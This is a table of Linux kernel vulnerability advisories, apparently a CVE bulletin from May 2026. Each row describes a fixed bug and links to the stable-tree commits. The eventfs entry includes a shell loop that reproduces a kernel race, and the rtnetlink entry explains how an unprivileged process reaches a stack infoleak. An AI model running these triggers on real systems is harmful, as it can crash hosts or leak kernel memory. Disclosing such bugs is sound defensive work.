| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fix resource leaks on device setup failure Make sure to call controller cleanup() if spi_setup() fails while registering a device to avoid leaking any resources allocated by setup(). | 2026-05-27 | not yet calculated | CVE-2026-46083 | https://git.kernel.org/stable/c/a2c817c629430fbbd54273525b472dac96e2c8fd https://git.kernel.org/stable/c/1e774294b2f944f59e03a04eb438768a4b93c3ce https://git.kernel.org/stable/c/11baa8b24bcb07ae2048f2566a220021d766abe0 https://git.kernel.org/stable/c/dbcead54b12468d9aa54c0e1f0042d838ec3b0ae https://git.kernel.org/stable/c/db357034f7e0cf23f233f414a8508312dfe8fbbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana_ib: Disable RX steering on RSS QP destroy When an RSS QP is destroyed (e.g. DPDK exit), mana_ib_destroy_qp_rss() destroys the RX WQ objects but does not disable vPort RX steering in firmware. This leaves stale steering configuration that still points to the destroyed RX objects. If traffic continues to arrive (e.g. peer VM is still transmitting) and the VF interface is subsequently brought up (mana_open), the firmware may deliver completions using stale CQ IDs from the old RX objects. These CQ IDs can be reused by the ethernet driver for new TX CQs, causing RX completions to land on TX CQs: WARNING: mana_poll_tx_cq+0x1b8/0x220 [mana] (is_sq == false) WARNING: mana_gd_process_eq_events+0x209/0x290 (cq_table lookup fails) Fix this by disabling vPort RX steering before destroying RX WQ objects. Note that mana_fence_rqs() cannot be used here because the fence completion is delivered on the CQ, which is polled by user-mode (e.g. DPDK) and not visible to the kernel driver. Refactor the disable logic into a shared mana_disable_vport_rx() in mana_en, exported for use by mana_ib, replacing the duplicate code. The ethernet driver's mana_dealloc_queues() is also updated to call this common function. | 2026-05-27 | not yet calculated | CVE-2026-46084 | https://git.kernel.org/stable/c/6a2d6273b6c3581ce7b90ce17b5cbb4efd19438f https://git.kernel.org/stable/c/f1ccc4d500a0b87a5599343fc2f798048836e184 https://git.kernel.org/stable/c/8ba804869382ce307f2a15f5f6f2adfd791f41dc https://git.kernel.org/stable/c/3be5ed233de03b00ae868cfc06e95331d8d9007c https://git.kernel.org/stable/c/dbeb256e8dd87233d891b170c0b32a6466467036 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: use a stable FDB dst snapshot in RCU readers Local FDB entries can be rewritten in place by `fdb_delete_local()`, which updates `f->dst` to another port or to `NULL` while keeping the entry alive. Several bridge RCU readers inspect `f->dst`, including `br_fdb_fillbuf()` through the `brforward_read()` sysfs path. These readers currently load `f->dst` multiple times and can therefore observe inconsistent values across the check and later dereference. In `br_fdb_fillbuf()`, this means a concurrent local-FDB update can change `f->dst` after the NULL check and before the `port_no` dereference, leading to a NULL-ptr-deref. Fix this by taking a single `READ_ONCE()` snapshot of `f->dst` in each affected RCU reader and using that snapshot for the rest of the access sequence. Also publish the in-place `f->dst` updates in `fdb_delete_local()` with `WRITE_ONCE()` so the readers and writer use matching access patterns. | 2026-05-27 | not yet calculated | CVE-2026-46086 | https://git.kernel.org/stable/c/0b9e4bbfb7c949151e3acd44ed4aa33614d2e110 https://git.kernel.org/stable/c/81af4137a30c4c2dc694dea8cacb180bd66000ef https://git.kernel.org/stable/c/5424e678f9b304e148cf5dcc047cffc7a56a3bb5 https://git.kernel.org/stable/c/9a2d9d4e657b23dc21f24cf139e3aeff0b61341f https://git.kernel.org/stable/c/df4601653201de21b487c3e7fffd464790cab808 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/stat: fix memory leak on damon_start() failure in damon_stat_start() Destroy the DAMON context and reset the global pointer when damon_start() fails. Otherwise, the context allocated by damon_stat_build_ctx() is leaked, and the stale damon_stat_context pointer will be overwritten on the next enable attempt, making the old allocation permanently unreachable. | 2026-05-27 | not yet calculated | CVE-2026-46087 | https://git.kernel.org/stable/c/8a62c58411cbd748d7aeab0e5b0963e33ff47a7a https://git.kernel.org/stable/c/50bc1d7e0f3bb6932c8dc5da0907eead0790176b https://git.kernel.org/stable/c/e04ed278d25bf15769800bf6e35c6737f137186f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: control: Validate buf_len before strnlen() in snd_ctl_elem_init_enum_names() snd_ctl_elem_init_enum_names() advances pointer p through the names buffer while decrementing buf_len. If buf_len reaches zero but items remain, the next iteration calls strnlen(p, 0). While strnlen(p, 0) returns 0 and would hit the existing name_len == 0 error path, CONFIG_FORTIFY_SOURCE's fortified strnlen() first checks maxlen against __builtin_dynamic_object_size(). When Clang loses track of p's object size inside the loop, this triggers a BRK exception panic before the return value is examined. Add a buf_len == 0 guard at the loop entry to prevent calling fortified strnlen() on an exhausted buffer. Found by kernel fuzz testing through Xiaomi Smartphone. | 2026-05-27 | not yet calculated | CVE-2026-46088 | https://git.kernel.org/stable/c/1fbe46d2b72754d8bd580e13e59ccb5d3d0e8cb0 https://git.kernel.org/stable/c/8ba0214c3dd32b8ec652947e3f2bc5b8f6e6be9e https://git.kernel.org/stable/c/654c818a69c21d2bea4e8fd9eae7da865df9a5c8 https://git.kernel.org/stable/c/82012fd3e78a14360fbc2f1a7491589896704f97 https://git.kernel.org/stable/c/e0da8a8cac74f4b9f577979d131f0d2b88a84487 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: zram: do not forget to endio for partial discard requests As reported by Qu Wenruo and Avinesh Kumar, the following getconf PAGESIZE 65536 blkdiscard -p 4k /dev/zram0 takes literally forever to complete. zram doesn't support partial discards and just returns immediately w/o doing any discard work in such cases. The problem is that we forget to endio on our way out, so blkdiscard sleeps forever in submit_bio_wait(). Fix this by jumping to end_bio label, which does bio_endio(). | 2026-05-27 | not yet calculated | CVE-2026-46089 | https://git.kernel.org/stable/c/2d1f18efccdb8b29552399d024c36b705447e975 https://git.kernel.org/stable/c/35d3300f6357cfaa72db2721dc2b345b19bac5df https://git.kernel.org/stable/c/a02363f71a79b755daa78a70d6b217f9c13c8c85 https://git.kernel.org/stable/c/68ce397e8236088fc53b9532d383a722288c8194 https://git.kernel.org/stable/c/e3668b371329ea036ff022ce8ecc82f8befcf003 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rc: igorplugusb: heed coherency rules In a control request, the USB request structure can be subject to DMA on some HCs. Hence it must obey the rules for DMA coherency. Allocate it separately. | 2026-05-27 | not yet calculated | CVE-2026-46091 | https://git.kernel.org/stable/c/18d6a7c9e4e63c57157e9a57dd9bf3cd38e4c45a https://git.kernel.org/stable/c/0be8fcd9005e3d3b5a61fe34b070a9663adbb4dc https://git.kernel.org/stable/c/0adac0ee2c42027d80bac02ea9b576a88f8955d3 https://git.kernel.org/stable/c/a62ca67e3c72fb297dc7c86495ba8f7329d7f150 https://git.kernel.org/stable/c/eac69475b01fe1e861dfe3960b57fa95671c132e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: check for PCI upstream bridge existence pci_upstream_bridge() returns NULL if the device is on a root bus. If 8821CE is installed in the system with such a PCI topology, the probing routine will crash. This has probably been unnoticed as 8821CE is mostly supplied in laptops where there is a PCI-to-PCI bridge located upstream from the device. However the card might be installed on a system with different configuration. Check if the bridge does exist for the specific workaround to be applied. Found by Linux Verification Center (linuxtesting.org) with Svace static analysis tool. | 2026-05-27 | not yet calculated | CVE-2026-46092 | https://git.kernel.org/stable/c/eb101d2abdcccb514ca4fccd3b278dd8267374f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bounds check in check_xattrs() to prevent out-of-bounds access The bounds check for the next xattr entry in check_xattrs() uses (void *)next >= end, which allows next to point within sizeof(u32) bytes of end. On the next loop iteration, IS_LAST_ENTRY() reads 4 bytes via *(__u32 *)(entry), which can overrun the valid xattr region. For example, if next lands at end - 1, the check passes since next < end, but IS_LAST_ENTRY() reads 4 bytes starting at end - 1, accessing 3 bytes beyond the valid region. Fix this by changing the check to (void *)next + sizeof(u32) > end, ensuring there is always enough space for the IS_LAST_ENTRY() read on the subsequent iteration. | 2026-05-27 | not yet calculated | CVE-2026-46094 | https://git.kernel.org/stable/c/ab6da97bc310db35d4e4ef5354bc3ff626b0698c https://git.kernel.org/stable/c/5a5314d2387633a272a04d1bd8727f99058e4e68 https://git.kernel.org/stable/c/537e065977022aa22f2c2503e8accaf16622e0fd https://git.kernel.org/stable/c/520986722dbf869c122252123fc161c7302eab7d https://git.kernel.org/stable/c/eceafc31ea7b42c984ece10d79d505c0bb6615d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/md-llbitmap: raise barrier before state machine transition Move the barrier raise operation before calling llbitmap_state_machine() in both llbitmap_start_write() and llbitmap_start_discard(). This ensures the barrier is in place before any state transitions occur, preventing potential race conditions where the state machine could complete before the barrier is properly raised. | 2026-05-27 | not yet calculated | CVE-2026-46095 | https://git.kernel.org/stable/c/9142f00a9287ca38152717e3e88a033a27774e7f https://git.kernel.org/stable/c/9701d51dd378380ba05293fa391e8ba01065ae8d https://git.kernel.org/stable/c/ef4ca3d4bf09716cff9ba00eb0351deadc8417ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm2-sessions: Fix missing tpm_buf_destroy() in tpm2_read_public() tpm2_read_public() calls tpm_buf_init() but fails to call tpm_buf_destroy() on two exit paths, leaking a page allocation: 1. When name_size() returns an error (unrecognized hash algorithm), the function returns directly without destroying the buffer. 2. On the success path, the buffer is never destroyed before returning. All other error paths in the function correctly call tpm_buf_destroy() before returning. Fix both by adding the missing tpm_buf_destroy() calls. | 2026-05-27 | not yet calculated | CVE-2026-46096 | https://git.kernel.org/stable/c/f8775d9d9062da662cc861f9ff7722a65896d4cd https://git.kernel.org/stable/c/2f434be87e256fd58254f60ddf5d7d58e775ca0b https://git.kernel.org/stable/c/f0f75a3d98b7959a8677b6363e23190f3018636b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: edt-ft5x06 - fix use-after-free in debugfs teardown The commit 68743c500c6e ("Input: edt-ft5x06 - use per-client debugfs directory") removed the manual debugfs teardown, relying on the I2C core to handle it. However, this creates a window where debugfs files are still accessible after edt_ft5x06_ts_teardown_debugfs() frees tsdata->raw_buffer. To prevent a use-after-free, protect the freeing of raw_buffer with the device mutex and set raw_buffer to NULL. The debugfs read function already checks if raw_buffer is NULL under the same mutex, so this safely avoids the use-after-free. | 2026-05-27 | not yet calculated | CVE-2026-46097 | https://git.kernel.org/stable/c/a516d43886623e3cca5fa3446bed8fc7c7982be2 https://git.kernel.org/stable/c/9f6c5e7b747d40e1c65cbfcb975857d25154c075 https://git.kernel.org/stable/c/f5f9e07060519e2287e99019a6de1eb3ebb65c37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: caif: clear client service pointer on teardown `caif_connect()` can tear down an existing client after remote shutdown by calling `caif_disconnect_client()` followed by `caif_free_client()`. `caif_free_client()` releases the service layer referenced by `adap_layer->dn`, but leaves that pointer stale. When the socket is later destroyed, `caif_sock_destructor()` calls `caif_free_client()` again and dereferences the freed service pointer. Clear the client/service links before releasing the service object so repeated teardown becomes harmless. | 2026-05-27 | not yet calculated | CVE-2026-46098 | https://git.kernel.org/stable/c/914c6456fcfc21a3d553945dff62fd1621d6155d https://git.kernel.org/stable/c/3ac6db584d9d420267bb8413115707eeec76d9cf https://git.kernel.org/stable/c/63d21a3aa0108b9dde4e99b0d3d5d679ac68c0f9 https://git.kernel.org/stable/c/a4b191ddc12c55ddb62feb096536f819f384d6f1 https://git.kernel.org/stable/c/f7cf8ece8cee3c1ee361991470cdb1eb65ab02e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: reject zero shift in nft_bitwise Reject zero shift operands for nft_bitwise left and right shift expressions during initialization. The carry propagation logic computes the carry from the adjacent 32-bit word using BITS_PER_TYPE(u32) - shift. A zero shift operand turns this into a 32-bit shift, which is undefined behaviour. Reject zero shift operands in the control plane, alongside the existing check for values greater than or equal to 32, so malformed rules never reach the packet path. | 2026-05-27 | not yet calculated | CVE-2026-46101 | https://git.kernel.org/stable/c/bffef0acec9c3b837a785248a893137fb7f26c95 https://git.kernel.org/stable/c/ca24f1243ad1a4d12d6a23876bbbe3ed02099853 https://git.kernel.org/stable/c/6f820139d16a4c9865a145d4a9cf9c92cc632c14 https://git.kernel.org/stable/c/f370205974f171a5868c13ff30d7642fed46e47b https://git.kernel.org/stable/c/fe11e5c40817b84abaa5d83bfb6586d8412bfd07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: ucan: fix devres lifetime USB drivers bind to USB interfaces and any device managed resources should have their lifetime tied to the interface rather than parent USB device. This avoids issues like memory leaks when drivers are unbound without their devices being physically disconnected (e.g. on probe deferral or configuration changes). Fix the control message buffer lifetime so that it is released on driver unbind. | 2026-05-27 | not yet calculated | CVE-2026-46103 | https://git.kernel.org/stable/c/4b7d07747400cfd7eff1ba7b8b5a7c8d5a58f705 https://git.kernel.org/stable/c/10b7b676b78a7bd888d19729b459aad7fc1f428b https://git.kernel.org/stable/c/c524c124e3094d2de12235a513854c03d06a2b58 https://git.kernel.org/stable/c/c0d3ccc6929e4509076df8f30a4fb1dc5018b0ae https://git.kernel.org/stable/c/fed4626501c871890da287bec62a96e52da1af89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: use sk blob accessor in socket permission helpers SELinux socket state lives in the composite LSM socket blob. sock_has_perm() and nlmsg_sock_has_extended_perms() currently dereference sk->sk_security directly, which assumes the SELinux socket blob is at offset zero. In stacked configurations that assumption does not hold. If another LSM allocates socket blob storage before SELinux, these helpers may read the wrong blob and feed invalid SID and class values into AVC checks. Use selinux_sock() instead of accessing sk->sk_security directly. | 2026-05-28 | not yet calculated | CVE-2026-46104 | https://git.kernel.org/stable/c/d350fef4bc2467fe1bce15f7a20fe60e01ce41ad https://git.kernel.org/stable/c/7eca71f57f194c1638ebb7f4097d6be8fd04c101 https://git.kernel.org/stable/c/032e70aff025d7c519af9ab791cd084380619263 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventfs: Hold eventfs_mutex and SRCU when remount walks events Commit 340f0c7067a9 ("eventfs: Update all the eventfs_inodes from the events descriptor") had eventfs_set_attrs() recurse through ei->children on remount. The walk only holds the rcu_read_lock() taken by tracefs_apply_options() over tracefs_inodes, which is wrong: - list_for_each_entry over ei->children races with the list_del_rcu() in eventfs_remove_rec() -- LIST_POISON1 deref, same shape as d2603279c7d6. - eventfs_inodes are freed via call_srcu(&eventfs_srcu, ...). rcu_read_lock() does not extend an SRCU grace period, so ti->private can be reclaimed under the walk. - The writes to ei->attr race with eventfs_set_attr(), which holds eventfs_mutex. Reproducer: while :; do mount -o remount,uid=$((RANDOM%1000)) /sys/kernel/tracing; done & while :; do echo "p:kp submit_bio" > /sys/kernel/tracing/kprobe_events echo > /sys/kernel/tracing/kprobe_events done Wrap the events portion of tracefs_apply_options() in eventfs_remount_lock()/_unlock() that take eventfs_mutex and srcu_read_lock(&eventfs_srcu). eventfs_set_attrs() doesn't sleep so the nested rcu_read_lock() is fine; lockdep_assert_held() pins the contract. Comment in tracefs_drop_inode() said "RCU cycle" -- it is SRCU. | 2026-05-28 | not yet calculated | CVE-2026-46106 | https://git.kernel.org/stable/c/ae9cd0b46b1890040006a2fc5e905c5d6053fd02 https://git.kernel.org/stable/c/44e64d8a432837308f4dda3ffe819f1ec092a0ba https://git.kernel.org/stable/c/52b109f1b875b912d4ab2c5fdd8c322d47119d9b https://git.kernel.org/stable/c/ed2ad73bcb0a7a6cc934097d4853b6d5124c317e https://git.kernel.org/stable/c/07004a8c4b572171934390148ee48c4175c77eed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi:si: Return state to normal if message allocation fails There were places where nothing would get started if a message allocation failed, so the driver needs to return to normal state. | 2026-05-28 | not yet calculated | CVE-2026-46108 | https://git.kernel.org/stable/c/ce905b65e649eee378a0f37e8219f1d70efb3007 https://git.kernel.org/stable/c/88881dc1da86064f479378bc9d0a4956c3d0bb12 https://git.kernel.org/stable/c/bc13fce9eeec88c4950924754c3347c6dc66ff4c https://git.kernel.org/stable/c/ba60140d4133231b49185ac8bf6e54f318d3134e https://git.kernel.org/stable/c/09dd798270ff582d7309f285d4aaf5dbebae01cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: ulpi: fix memory leak on ulpi_register() error paths Commit 01af542392b5 ("usb: ulpi: fix double free in ulpi_register_interface() error path") removed kfree(ulpi) from ulpi_register_interface() to fix a double-free when device_register() fails. But when ulpi_of_register() or ulpi_read_id() fail before device_register() is called, the ulpi allocation is leaked. Add kfree(ulpi) on both error paths to properly clean up the allocation. | 2026-05-28 | not yet calculated | CVE-2026-46109 | https://git.kernel.org/stable/c/b0c0d44adb55c66663886cb6e30ee92cbb0f5385 https://git.kernel.org/stable/c/be2c1d825f54277472c87019e82013ac534ddc4c https://git.kernel.org/stable/c/2a71e01b2cf9b4329ff67102c1bea7448c2a2d2d https://git.kernel.org/stable/c/f30ccfc2985590b33a23a3d8bed7ca16c0af551b https://git.kernel.org/stable/c/0b9fcab1b8608d429e5f239afb197de928d4de7d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Fix null ptr deref in papr_hvpipe_dev_create_handle() Commit 6d3789d347a7 ("papr-hvpipe: convert papr_hvpipe_dev_create_handle() to FD_PREPARE()") changed the create handle to FD_PREPARE(), but it caused a kernel null-ptr-deref because after the call to retain_and_null_ptr(src_info), src_info is re-used for adding it to the global list. Getting the following kernel panic in papr_hvpipe_dev_create_handle() when trying to add src_info to the list. Kernel attempted to write user page (0) - exploit attempt? (uid: 0) BUG: Kernel NULL pointer dereference on write at 0x00000000 Faulting instruction address: 0xc0000000001b44a0 Oops: Kernel access of bad area, sig: 11 [#1] ... Call Trace: papr_hvpipe_dev_ioctl+0x1f4/0x48c (unreliable) sys_ioctl+0x528/0x1064 system_call_exception+0x128/0x360 system_call_vectored_common+0x15c/0x2ec Now, the error handling with FD_PREPARE's file cleanup and __free(kfree) auto cleanup is getting too convoluted. This is mainly because we need to ensure only one user gets the srcID handle. To simplify this, we allocate and prepare the src_info at the beginning and add it to the global list under a spinlock after checking that no duplicates exist. This simplifies the error handling: if FD_ADD fails, we can simply remove the src_info from the list and consume any pending msg in hvpipe to be cleared, after src_info became visible in the global list. | 2026-05-28 | not yet calculated | CVE-2026-46118 | https://git.kernel.org/stable/c/735439394dde8462f9b50566727fbe333beaadaf https://git.kernel.org/stable/c/cf51bec1560f8bf115d1476f60335f9d90e110b0 https://git.kernel.org/stable/c/1b9f7aafa44f5ce852c00509104d10fd9eb0f402 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs-schemes: protect memcg_path kfree() with damon_sysfs_lock Patch series "mm/damon/sysfs-schemes: fix use-after-free for [memcg_]path". Reads of 'memcg_path' and 'path' files in the DAMON sysfs interface could race with their writes, resulting in use-after-free. Fix those. This patch (of 2): damon_sysfs_scheme_filter->memcg_path can be read and written by users, via the DAMON sysfs memcg_path file. It can also be indirectly read, for the parameters {on,off}line committing to DAMON. The reads for parameters committing are protected by damon_sysfs_lock to avoid the sysfs files being destroyed while any of the parameters are being read. But the user-driven direct reads and writes are not protected by any lock, while the write is deallocating the memcg_path-pointing buffer. As a result, the readers could read the already freed buffer (use-after-free). Note that the user-reads don't race when the same open file is used by the writer, due to kernfs's open file locking. Nonetheless, doing the reads and writes with separate open files would be common. Fix it by protecting both the user-direct reads and writes with damon_sysfs_lock. | 2026-05-28 | not yet calculated | CVE-2026-46121 | https://git.kernel.org/stable/c/b1e9f2d5870776347edef927f9bb3ea19b8e3abb https://git.kernel.org/stable/c/c88802d0e8edd14b6cd2daf3000f99adbc4c85c5 https://git.kernel.org/stable/c/eafd6f5372d29b0dd213799b92c2c9c7ad31d7da https://git.kernel.org/stable/c/baecc45ad60e621ef14d6c1e7f41ef36bbfdf910 https://git.kernel.org/stable/c/1e68eb96e8beb1abefd12dd22c5637795d8a877e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: b43: enforce bounds check on firmware key index in b43_rx() The firmware-controlled key index in b43_rx() can exceed the dev->key[] array size (58 entries). The existing B43_WARN_ON is non-enforcing in production builds, allowing an out-of-bounds read. Make the B43_WARN_ON check enforcing by dropping the frame when the firmware returns an invalid key index. | 2026-05-28 | not yet calculated | CVE-2026-46122 | https://git.kernel.org/stable/c/c3d7b90dc95020cd9282c4630e402fe224f7644e https://git.kernel.org/stable/c/1e9e55cf66f0fa4799f4d86ef3aaba8e606b5c14 https://git.kernel.org/stable/c/d7029879bafdac2006c67553807d122283dc6cbf https://git.kernel.org/stable/c/219ba67e69e49681e48c822d6eaafb5def032f34 https://git.kernel.org/stable/c/1f4f78bf8549e6ac4f04fba4176854f3a6e0c332 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Fix mana_destroy_wq_obj() cleanup in mana_ib_create_qp_rss() Sashiko points out there are two bugs here in the error unwind flow, both related to how the WQ table is unwound. First there is a double i-- on the first failure path due to the while loop having a i--, remove it. Second if mana_ib_install_cq_cb() fails then mana_create_wq_obj() is not undone due to the above i--. | 2026-05-28 | not yet calculated | CVE-2026-46126 | https://git.kernel.org/stable/c/8f23eb6c50f1a4bf32fc4d62cfb9fc39e8e586cf https://git.kernel.org/stable/c/bb9cb36eaefa4dcb7c0d9f7a01e5c739abdd53a8 https://git.kernel.org/stable/c/9a05a6798177e44dfbe18393be2c1ebb89ab06fd https://git.kernel.org/stable/c/34ecf795692ee57c393109f4a24ccc313091e137 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/ocrdma: Don't NULL deref uctx on errors in ocrdma_copy_pd_uresp() Sashiko points out that pd->uctx isn't initialized until late in the function so all these error flow references are NULL and will crash. Use the uctx that isn't NULL. | 2026-05-28 | not yet calculated | CVE-2026-46127 | https://git.kernel.org/stable/c/e01a957561f663d3b68d2fd233a4502e3367efcd https://git.kernel.org/stable/c/75fc130664ae324e7b2f9ad3630e0f175e9ca6c8 https://git.kernel.org/stable/c/8832626a483439e207734e027afff322ccdf726e https://git.kernel.org/stable/c/ec44c00a4fe1327efa35083f98b39c01cb535a51 https://git.kernel.org/stable/c/34fbf48cf3b410d2a6e8c586fa952a36331ca5ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipmi: Check event message buffer response for bad data The event message buffer response data size got checked later when processing, but check it right after the response comes back. It appears some BMCs may return an empty message instead of an error when fetching events. There are apparently some new BMCs that make this error, so we need to compensate. | 2026-05-28 | not yet calculated | CVE-2026-46128 | https://git.kernel.org/stable/c/2418e4b21fb1355504d095da5d5f0a210564a43d https://git.kernel.org/stable/c/7f7ada72c07a83b46045ddfeee526bd9e2e3c8f0 https://git.kernel.org/stable/c/42432b579a594b66ac32e5e7b7c26e6bc578ec89 https://git.kernel.org/stable/c/24269264c3d59a49eb09b10af2c75b14f2931482 https://git.kernel.org/stable/c/36920f30e78e69df01f9691c470b6f3ba8aebf98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity-fec: fix reading parity bytes split across blocks (take 3) fec_decode_bufs() assumes that the parity bytes of the first RS codeword it decodes are never split across parity blocks. This assumption is false. Consider v->fec->block_size == 4096 && v->fec->roots == 17 && fio->nbufs == 1, for example. In that case, each call to fec_decode_bufs() consumes v->fec->roots * (fio->nbufs << DM_VERITY_FEC_BUF_RS_BITS) = 272 parity bytes. Considering that the parity data for each message block starts on a block boundary, the byte alignment in the parity data will iterate through 272*i mod 4096 until the 3 parity blocks have been consumed. On the 16th call (i=15), the alignment will be 4080 bytes into the first block. Only 16 bytes remain in that block, but 17 parity bytes will be needed. The code reads out-of-bounds from the parity block buffer. Fortunately this doesn't normally happen, since it can occur only for certain non-default values of fec_roots *and* when the maximum number of buffers couldn't be allocated due to low memory. For example with block_size=4096 only the following cases are affected: fec_roots=17: nbufs in [1, 3, 5, 15] fec_roots=19: nbufs in [1, 229] fec_roots=21: nbufs in [1, 3, 5, 13, 15, 39, 65, 195] fec_roots=23: nbufs in [1, 89] Regardless, fix it by refactoring how the parity blocks are read. | 2026-05-28 | not yet calculated | CVE-2026-46130 | https://git.kernel.org/stable/c/3d1b4e2d8ac0a1a1390a117f61ce0ca1c47e3bcb https://git.kernel.org/stable/c/430a05cb926f6bdf53e81460a2c3a553257f3f61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: check for nEPT/nNPT in slow flush hypercalls Checking is_guest_mode(vcpu) is incorrect, because translate_nested_gpa() is only valid if an L2 guest is running *with nested EPT/NPT enabled*. Instead use the same condition as translate_nested_gpa() itself. | 2026-05-28 | not yet calculated | CVE-2026-46131 | https://git.kernel.org/stable/c/971f17f5d91045404e3914029ea57c3da90179a4 https://git.kernel.org/stable/c/45fc766bc756ff1d66f8ca026a9c4f7f764adfae https://git.kernel.org/stable/c/d6f4e217d663ede5becc2fd6cb612c749677387b https://git.kernel.org/stable/c/4c7f8436b19a2a3acc0cb6b6e3becd6796ae5c57 https://git.kernel.org/stable/c/464af6fc2b1dcc74005b7f58ee3812b17777efee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rtnetlink: zero ifla_vf_broadcast to avoid stack infoleak in rtnl_fill_vfinfo rtnl_fill_vfinfo() declares struct ifla_vf_broadcast on the stack without initialisation: struct ifla_vf_broadcast vf_broadcast; The struct contains a single fixed 32-byte field: /* include/uapi/linux/if_link.h */ struct ifla_vf_broadcast { __u8 broadcast[32]; }; The function then copies dev->broadcast into it using dev->addr_len as the length: memcpy(vf_broadcast.broadcast, dev->broadcast, dev->addr_len); On Ethernet devices (the overwhelming majority of SR-IOV NICs) dev->addr_len is 6, so only the first 6 bytes of broadcast[] are written. The remaining 26 bytes retain whatever was previously on the kernel stack. The full struct is then handed to userspace via: nla_put(skb, IFLA_VF_BROADCAST, sizeof(vf_broadcast), &vf_broadcast) leaking up to 26 bytes of uninitialised kernel stack per VF per RTM_GETLINK request, repeatable. The other vf_* structs in the same function are explicitly zeroed for exactly this reason - see the memset() calls for ivi, vf_vlan_info, node_guid and port_guid a few lines above. vf_broadcast was simply missed when it was added. Reachability: any unprivileged local process can open AF_NETLINK / NETLINK_ROUTE without capabilities and send RTM_GETLINK with an IFLA_EXT_MASK attribute carrying RTEXT_FILTER_VF. The kernel walks each VF and emits IFLA_VF_BROADCAST, leaking 26 bytes of stack per VF per request. Stack residue at this call site can include return addresses and transient sensitive data; KASAN with stack instrumentation, or KMSAN, will flag the nla_put() when reproduced. Zero the on-stack struct before the partial memcpy, matching the existing pattern used for the other vf_* structs in the same function. | 2026-05-28 | not yet calculated | CVE-2026-46132 | https://git.kernel.org/stable/c/0653c0516234c8258975d268a749115fc0f0ff00 https://git.kernel.org/stable/c/c5b1b92ab7eff1a6e8c507ddde6fd02fabd0cfa8 https://git.kernel.org/stable/c/fbe0e6197225e6a83cf113a67a4b425f8de0bcd5 https://git.kernel.org/stable/c/38bcc21f52246badb3154b6158dcb381d98de011 https://git.kernel.org/stable/c/4b9e327991815e128ad3af75c3a04630a63ce3e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_typec: Init mutex in Thunderbolt registration cros_typec_register_thunderbolt() missed initializing the `adata->lock` mutex. This leads to a NULL dereference when the mutex is later acquired (e.g. in cros_typec_altmode_work()). Initialize the mutex in cros_typec_register_thunderbolt() to fix the issue. | 2026-05-28 | not yet calculated | CVE-2026-46134 | https://git.kernel.org/stable/c/23ae72e8c2f1c1d1da8cbd479320ddcfcc9c7435 https://git.kernel.org/stable/c/3b13d5883a097f538fccbab1c61c95546d29621f https://git.kernel.org/stable/c/525cb7ba6661074c1c5cc3772bccc6afab6791ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix a potential clc buffer length underflow The buf_len is used to limit the iterations for retrieving the country power setting and may underflow under certain conditions due to changes in the power table in CLC. This underflow leads to an almost infinite loop or an invalid power setting resulting in driver initialization failure. | 2026-05-28 | not yet calculated | CVE-2026-46136 | https://git.kernel.org/stable/c/e451c325b000b9a0081fd93bc6d103d6943d4b55 https://git.kernel.org/stable/c/90cc573fd2f46ddbc2c329e7814b5ba3deb7b939 https://git.kernel.org/stable/c/0aa63d33742b805d1a218d18d12b983cce4b2f7b https://git.kernel.org/stable/c/a0111847f0b4f6023f6dd320114697514e024ba3 https://git.kernel.org/stable/c/5373f8b19e568b5c217832b9bbef165bd2b2df14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: use kzalloc to zero-initialize security descriptor buffer Commit 62e7dd0a39c2d ("smb: common: change the data type of num_aces to le16") split struct smb_acl's __le32 num_aces field into __le16 num_aces and __le16 reserved. The reserved field corresponds to Sbz2 in the MS-DTYP ACL wire format, which must be zero [1]. When building an ACL descriptor in build_sec_desc(), we are using a kmalloc()'ed descriptor buffer and writing the fields explicitly using le16() writes now. This never writes to the 2 byte reserved field, leaving it as uninitialized heap data. When the reserved field happens to contain non-zero slab garbage, Samba rejects the security descriptor with "ndr_pull_security_descriptor failed: Range Error", causing chmod to fail with EINVAL. Change kmalloc() to kzalloc() to ensure the entire buffer is zero-initialized. [1] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/20233ed8-a6c6-4097-aafa-dd545ed24428 | 2026-05-28 | not yet calculated | CVE-2026-46139 | https://git.kernel.org/stable/c/4c3ed344a970aad51388ac3b0145b98318f0e21f https://git.kernel.org/stable/c/941a1e6eb35440336913afc88a82103291956d5d https://git.kernel.org/stable/c/be1ef9512a3f5a755895c24f31b334342f4aa15b 